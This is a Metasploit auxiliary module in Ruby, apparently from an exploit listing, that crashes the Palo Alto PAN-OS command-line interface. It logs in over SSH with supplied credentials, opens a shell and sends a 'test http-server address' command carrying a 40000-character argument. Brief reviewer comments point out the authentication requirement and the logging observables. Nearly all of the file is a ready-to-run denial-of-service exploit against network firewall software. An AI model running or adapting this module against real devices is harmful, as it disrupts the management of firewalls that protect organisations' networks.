Palo Alto PAN-OS CLI Crash
##
# This module requires Metasploit Framework and compatible Ruby.
##

require 'msf/core'
require 'net/ssh'

# Auxiliary scanner module for a post-authentication denial of service in the
# PAN-OS command-line interface.
#
# For each target host the module logs in over SSH with the supplied
# credentials, requests a PTY and an interactive shell, and submits a single
# `test http-server address` command whose argument is 40000 characters long.
# Anything the remote side prints is echoed to the console.
#
# Review notes for defenders:
# - The trigger needs a valid CLI login, so exposure is bounded by who can
#   reach and authenticate to the management SSH service.
# - The input is one CLI line carrying a 40000-character argument, which is
#   the observable to look for in CLI/audit logging, together with
#   unexpected CLI session terminations.
# - The page names no affected or fixed PAN-OS versions; confirm those
#   against the vendor advisory rather than this listing.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::SSH
  include Msf::Auxiliary::Scanner

  # Registers the module metadata and the options the operator must set.
  #
  # @param info [Hash] metadata passed in by the framework and merged with
  #   the values declared here
  def initialize(info = {})
    # The description lines stay flush-left so the string content is unchanged.
    module_info = update_info(
      info,
      'Name' => 'Palo Alto PAN-OS CLI Crash (Post-Auth)',
      'Description' => %q{
This module triggers a denial-of-service condition in the CLI of
Palo Alto PAN-OS by sending an overly long input after authentication.
},
      'Author' => ['Cody Sixteen'],
      'License' => MSF_LICENSE,
      'References' => [
        ['URL', 'https://code610.blogspot.com/2025/05/palo-alto-postauth-cli-memory.html']
      ],
      'DisclosureDate' => 'May 25 2025'
    )
    super(module_info)

    # Both credentials are mandatory: the condition is only reachable from an
    # authenticated session.
    ssh_settings = [
      Opt::RPORT(22),
      OptString.new('USERNAME', [true, 'SSH username']),
      OptString.new('PASSWORD', [true, 'SSH password'])
    ]
    register_options(ssh_settings)
  end

  # Runs the check against one host: authenticate, open a PTY-backed shell,
  # send the oversized command, relay remote output, then send `exit`.
  #
  # SSH and authentication failures are reported on the console and never
  # raised to the caller.
  #
  # @param ip [String] address of the host handed over by the scanner mixin
  def run_host(ip)
    rport = datastore['RPORT']

    begin
      print_status("[*] Connecting to #{ip}:#{rport} via SSH...")

      # Password-only, non-interactive login with a 10 second connect timeout.
      ssh_opts = {
        password: datastore['PASSWORD'],
        port: rport,
        non_interactive: true,
        timeout: 10
      }

      Net::SSH.start(ip, datastore['USERNAME'], **ssh_opts) do |ssh|
        print_good("[+] SSH connection established to #{ip}")

        ssh.open_channel do |channel|
          terminal = { term: 'xterm', chars_wide: 80, chars_high: 24, modes: {} }

          channel.request_pty(terminal) do |_pty, pty_ok|
            unless pty_ok
              print_error("[-] PTY request failed")
              next
            end
            print_good("[+] PTY successfully allocated")

            channel.send_channel_request("shell") do |_shell, shell_ok|
              unless shell_ok
                print_error("[-] Failed to open shell channel")
                next
              end
              print_good("[+] Shell channel opened. Sending payload...")

              # One CLI line: the command prefix followed by 40000 filler characters.
              oversized_input = "test http-server address #{'A' * 40000}\n"
              channel.send_data(oversized_input)

              # Relay whatever the device prints, stdout and stderr alike.
              channel.on_data { |_ch, data| print_line("[remote] #{data}") }
              channel.on_extended_data { |_ch, _type, data| print_line("[remote][stderr] #{data}") }

              # One-second pause before queuing `exit`, the author's allowance
              # for the long input to be handled.
              Rex.sleep(1)
              channel.send_data("exit\n")
            end
          end

          channel.on_close { |_ch| print_status("[*] SSH channel closed.") }
        end

        # Drive the SSH event loop until the channel is done.
        ssh.loop
      end
    rescue Net::SSH::AuthenticationFailed
      print_error("[-] Authentication failed for #{ip}")
    rescue Net::SSH::Exception => e
      print_error("[-] SSH connection error with #{ip}: #{e.message}")
    rescue => e
      print_error("[-] Unexpected error: #{e.message}")
    end
  end
end